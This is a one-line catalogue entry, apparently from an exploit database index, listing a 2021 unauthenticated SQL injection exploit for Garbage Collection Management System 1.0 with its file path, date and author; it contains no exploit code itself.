50085,exploits/php/webapps/50085.txt,"Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)",2021-07-02,ircashem,webapps,php,
|
||||
|
|